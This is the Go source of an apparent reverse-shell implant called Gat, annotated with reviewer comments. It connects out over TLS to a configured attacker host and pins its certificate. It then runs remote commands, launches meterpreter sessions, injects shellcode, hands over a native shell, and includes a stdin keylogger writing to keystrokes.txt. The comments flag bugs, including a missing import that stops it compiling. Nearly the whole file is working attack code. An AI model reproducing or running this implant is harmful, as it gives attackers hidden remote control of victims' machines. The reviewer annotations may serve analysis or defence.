// Listing: github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/Gat.go

// Command Gat dials out over TLS to a configured endpoint, checks the peer's
// certificate against a pinned SHA-256 fingerprint, and then treats every
// line received on that connection as a command to dispatch.
//
// Observable artefacts visible in this file: an outbound TLS connection with
// standard certificate verification disabled, the prompt string "[Gat]> "
// and the banner "Enjoy your native shell" written to the connection, and a
// file named keystrokes.txt created in the working directory by keylog.
package main

// NOTE(review): keylog below calls fmt.Printf, but "fmt" is not in this
// import block, so the file does not compile as listed.
import (
	"bufio"
	"bytes"
	"crypto/sha256"
	"crypto/tls"
	"encoding/hex"
	"net"
	"os"
	"strings"

	"github.com/m1ddl3w4r3/Gat/meterpreter"
	"github.com/m1ddl3w4r3/Gat/shell"
)

// Process exit codes passed to os.Exit.
//
// NOTE(review): iota is 0 on the first line, so errCouldNotDecode is
// 1 << 0 = 1; errHostUnreachable is iota = 1 and errBadFingerprint is
// iota = 2. The first two therefore share the value 1 and cannot be told
// apart from the exit status alone.
const (
	errCouldNotDecode  = 1 << iota
	errHostUnreachable = iota
	errBadFingerprint  = iota
)

// connectString is the "host:port" passed to tls.Dial and fingerPrint is the
// hex-encoded (optionally colon-separated) SHA-256 certificate fingerprint.
// Neither is assigned anywhere in this file; presumably both are set from
// outside the source (e.g. at build time) — TODO confirm.
var (
	connectString string
	fingerPrint   string
)

// interactiveShell runs a line-oriented command loop over conn.
//
// It writes the prompt, then reads newline-terminated commands from the
// remote peer until the connection ends or "exit" is received. The first
// space-separated word selects the action:
//
//	meterpreter TRANSPORT ADDRESS  calls meterpreter.Meterpreter
//	inject ARG                     calls shell.InjectShellcode
//	run_shell                      hands conn to runShell
//	exit                           leaves the loop
//	anything else                  passes the whole line to shell.ExecuteCmd
//
// Every conn.Write result is discarded, so a write failure is only noticed
// when a later scanner.Scan fails.
func interactiveShell(conn net.Conn) {
	var (
		exit   = false
		prompt = "[Gat]> "
		// bufio.Scanner's default token limit (64 KiB) applies; a longer
		// line makes Scan return false and ends the loop.
		scanner = bufio.NewScanner(conn)
	)

	conn.Write([]byte(prompt))

	for scanner.Scan() {
		command := scanner.Text()
		// Lines of zero or one byte are ignored; only the prompt is re-sent.
		if len(command) > 1 {
			// Split on single spaces only: consecutive spaces produce empty
			// argv entries, and there is no quoting.
			argv := strings.Split(command, " ")
			switch argv[0] {
			case "meterpreter":
				if len(argv) > 2 {
					transport := argv[1]
					address := argv[2]
					ok, err := meterpreter.Meterpreter(transport, address)
					if !ok {
						// NOTE(review): assumes err is non-nil whenever ok is
						// false; a nil err here would panic — confirm against
						// the meterpreter package.
						conn.Write([]byte(err.Error() + "\n"))
					}
				} else {
					conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n"))
				}
			case "inject":
				// With no argument the command is silently ignored; any
				// result of InjectShellcode is not reported back.
				if len(argv) > 1 {
					shell.InjectShellcode(argv[1])
				}
			case "exit":
				exit = true
			case "run_shell":
				conn.Write([]byte("Enjoy your native shell\n"))
				runShell(conn)
			default:
				// The unsplit line from the remote peer is handed over as-is;
				// presumably ExecuteCmd runs it and writes the output to
				// conn — its behavior is not visible in this file.
				shell.ExecuteCmd(command, conn)
			}

			// Break before the prompt write below so no prompt follows "exit".
			if exit {
				break
			}

		}
		conn.Write([]byte(prompt))
	}
}

// keylog copies runes read from the process's standard input into the file
// keystrokes.txt in the current working directory.
//
// The file is created if missing, truncated if present, and opened with mode
// 0644. Nothing in this file calls keylog.
//
// NOTE(review): fmt is used here but not imported (see the import block).
func keylog() {
	// Open a file to write the keystrokes to
	f, err := os.OpenFile("keystrokes.txt", os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
	if err != nil {
		fmt.Printf("Error opening file: %v\n", err)
		return
	}
	defer f.Close()

	// Create a buffered writer to write the keystrokes to the file
	w := bufio.NewWriter(f)

	// Read input from os.Stdin one rune at a time
	reader := bufio.NewReader(os.Stdin)
	for {
		// Read a single rune; any error (including EOF) ends the loop
		char, _, err := reader.ReadRune()
		if err != nil {
			break
		}

		// Write the character to the file (write error is not checked)
		w.WriteRune(char)

		// Flush after every rune so each character reaches the file
		// immediately; the Flush error is also discarded
		w.Flush()
	}
}

// runShell starts the command returned by shell.GetShell with its standard
// input, output and error all attached to conn, and blocks until it exits.
// The error returned by cmd.Run is discarded.
func runShell(conn net.Conn) {
	var cmd = shell.GetShell()
	cmd.Stdout = conn
	cmd.Stderr = conn
	cmd.Stdin = conn
	cmd.Run()
}

// checkKeyPin reports whether the SHA-256 digest of the raw DER bytes of any
// certificate presented by the peer equals fingerprint. The returned error
// is always nil.
//
// NOTE(review): reverse dials with InsecureSkipVerify set, so crypto/tls does
// no chain validation and this comparison is the only authentication of the
// peer. Only PeerCertificates[0] (the leaf) is tied to the key used in the
// handshake; the remaining entries are simply what the peer sent, so
// accepting a match at any index is weaker than comparing the leaf alone.
func checkKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
	valid := false
	connState := conn.ConnectionState()
	for _, peerCert := range connState.PeerCertificates {
		hash := sha256.Sum256(peerCert.Raw)
		// Equivalent to bytes.Equal; the loop does not stop at the first match.
		if bytes.Compare(hash[0:], fingerprint) == 0 {
			valid = true
		}
	}
	return valid, nil
}

// reverse opens a TLS connection to connectString, verifies the peer with
// checkKeyPin, and on success runs interactiveShell over the connection.
//
// It terminates the process with errHostUnreachable if the dial fails and
// with errBadFingerprint if the pin check fails.
func reverse(connectString string, fingerprint []byte) {
	var (
		conn *tls.Conn
		err  error
	)
	// Standard chain and hostname verification is turned off; checkKeyPin
	// below is the only check on who the peer is.
	config := &tls.Config{InsecureSkipVerify: true}
	if conn, err = tls.Dial("tcp", connectString, config); err != nil {
		os.Exit(errHostUnreachable)
	}

	defer conn.Close()

	// os.Exit does not run deferred calls, so conn.Close above is skipped on
	// this path; the connection is released when the process ends.
	if ok, err := checkKeyPin(conn, fingerprint); err != nil || !ok {
		os.Exit(errBadFingerprint)
	}
	interactiveShell(conn)
}

// main decodes the configured fingerprint and calls reverse. If either
// connectString or fingerPrint is empty it returns without doing anything.
func main() {
	if connectString != "" && fingerPrint != "" {
		// Accept both "AA:BB:..." and plain hex by stripping the colons.
		fprint := strings.Replace(fingerPrint, ":", "", -1)
		bytesFingerprint, err := hex.DecodeString(fprint)
		if err != nil {
			os.Exit(errCouldNotDecode)
		}
		// The decoded length is not checked here; a value that is not 32
		// bytes can never equal a SHA-256 digest in checkKeyPin.
		reverse(connectString, bytesFingerprint)
	}
}